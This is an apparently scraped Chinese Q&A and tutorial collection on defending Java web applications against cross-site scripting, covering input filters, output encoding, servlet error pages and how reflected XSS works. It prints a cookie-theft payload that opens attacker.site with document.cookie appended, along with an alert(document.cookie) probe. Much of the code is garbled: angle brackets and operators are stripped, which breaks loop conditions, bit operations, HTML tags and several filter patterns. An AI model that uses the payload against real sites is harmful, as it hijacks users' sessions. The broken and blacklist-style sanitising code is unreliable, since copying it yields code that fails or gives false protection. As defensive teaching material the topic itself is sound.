如何防止跨站点脚本攻击
防止跨站点脚本攻击的解决方法:
1.输入过滤
对每一个用户的输入或者请求首部,都要进行过滤。这需要程序员有良好的安全素养,而且需要覆盖到所有的输入源。而且还不能够阻止其他的一些问题,如错误页等。
final String filterPattern="[{}\\[\\];\\]";
String inputStr = s.replaceAll(filterPattern," ");
2.输出过滤
public static String encode(String data)
{
final StringBuffer buf = new StringBuffer();
final char[] chars = data.toCharArray();
for (int i = 0; i chars.length; i++)
{
buf.append("" + (int) chars[i]);
}
return buf.toString();
}
public static String decodeHex(final String data,
final String charEncoding)
{
if (data == null)
{
return null;
}
byte[] inBytes = null;
try
{
inBytes = data.getBytes(charEncoding);
}
catch (UnsupportedEncodingException e)
{
//use default charset
inBytes = data.getBytes();
}
byte[] outBytes = new byte[inBytes.length];
int b1;
int b2;
int j=0;
for (int i = 0; i inBytes.length; i++)
{
if (inBytes[i] == '%')
{
b1 = Character.digit((char) inBytes[++i], 16);
b2 = Character.digit((char) inBytes[++i], 16);
outBytes[j++] = (byte) (((b1 0xf) 4) +
(b2 0xf));
}
else
{
outBytes[j++] = inBytes[i];
}
}
String encodedStr = null;
try
{
encodedStr = new String(outBytes, 0, j, charEncoding);
}
catch (UnsupportedEncodingException e)
{
encodedStr = new String(outBytes, 0, j);
}
return encodedStr;
}
!-- Maps the 404 Not Found response code
to the error page /errPage404 --
error-page
error-code404/error-code
location/errPage404/location
/error-page
!-- Maps any thrown ServletExceptions
to the error page /errPageServ --
error-page
exception-typejavax.servlet.ServletException/exception-type
location/errPageServ/location
/error-page
!-- Maps any other thrown exceptions
to a generic error page /errPageGeneric --
error-page
exception-typejava.lang.Throwable/exception-type
location/errPageGeneric/location
/error-page
任何的非servlet例外都被/errPageGeneric路径捕捉,这样就可以处理。
Throwable throwable = (Throwable)
request.getAttribute("javax.servlet.error.exception");
String status_code = ((Integer)
request.getAttribute("javax.servlet.error.status_code")).toString( );
3.安装三方的应用防火墙,可以拦截css攻击。
附:
跨站脚本不像其他攻击只包含两个部分:攻击者和web站点。
跨站脚本包含三个部分:攻击者,客户和web站点。
跨站脚本攻击的目的是窃取客户的cookies,或者其他可以证明用户身份的敏感信息。
攻击
一个get请求
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host:
www.vulnerable.site
会产生如下的结果
HTML
TitleWelcome!/Title
Hi Joe Hacker
BR
Welcome to our system
...
/HTML
但是如果请求被篡改
GET /welcome.cgi?name=scriptalert(document.cookie)/script HTTP/1.0
Host: www.vulnerable.site
就会得到如下的响应
HTML
TitleWelcome!/Title
Hi scriptalert(document.cookie)/script
BR
Welcome to our system
...
/HTML
这样在客户端会有一段非法的脚本执行,这不具有破坏作用,但是如下的脚本就很危险了。
http://www.vulnerable.site/welcome.cgi?name=scriptwindow.open(“http://www.attacker.site/collect.cgi?cookie=”%2Bdocument.cookie)/script
响应如下:
HTML
TitleWelcome!/Title
Hi
scriptwindow.open(“http://www.attacker.site/collect.cgi?cookie=”+document.cookie)/script
BR
Welcome to our system
...
/HTML
浏览器回执行该脚本并将客户的cookie发到一个攻击者的网站,这样攻击者就得到了客户的cookie。
java web开发如何有效的防止xss攻击
配置过滤器,再实现 ServletRequest 的包装类。
将所有的编程全角字符的解决方式。首先添加一个jar包:commons-lang-2.5.jar ,然后在后台调用函数。
360检测出漏洞,修复方案“将用户所提供的内容输入输出进行过滤”怎么操作?
这个你要么不管他,要么到他们论坛里求助,有些漏洞其实不算啥漏洞。
java怎么解决跨站脚本xss
跨站漏洞是需要其他正常用户进入到漏洞页面,执行了攻击者构造的恶意JS代码偷取cookie,假如攻击者获得高权限用户的cookie就有机会以高权限用户的身份进入系统,然后再进一步入侵。
所以治本的方法就是对攻击者提交的数据进行过滤,不给其执行的机会。
用JAVA做一个网站,现在要做防止XSS攻击,请问怎么防止这种攻击
过滤特定符号pre t="code" l="java" public static String guolv(String a) {
a = a.replaceAll("%22", "");
a = a.replaceAll("%27", "");
a = a.replaceAll("%3E", "");
a = a.replaceAll("%3e", "");
a = a.replaceAll("%3C", "");
a = a.replaceAll("%3c", "");
a = a.replaceAll("", "");
a = a.replaceAll("", "");
a = a.replaceAll("\"", "");
a = a.replaceAll("'", "");
a = a.replaceAll("\\+", "");
a = a.replaceAll("\\(", "");
a = a.replaceAll("\\)", "");
a = a.replaceAll(" and ", "");
a = a.replaceAll(" or ", "");
a = a.replaceAll(" 1=1 ", "");
return a;
}
我想当一名白帽子,靠找 xss之类的漏洞挣钱,请问必须很精通javascript之类的语言吗?
javascript 只是前端脚本语言
你想要去了解很多编程语言才能当白帽子
比如说 php asp.net java 等等...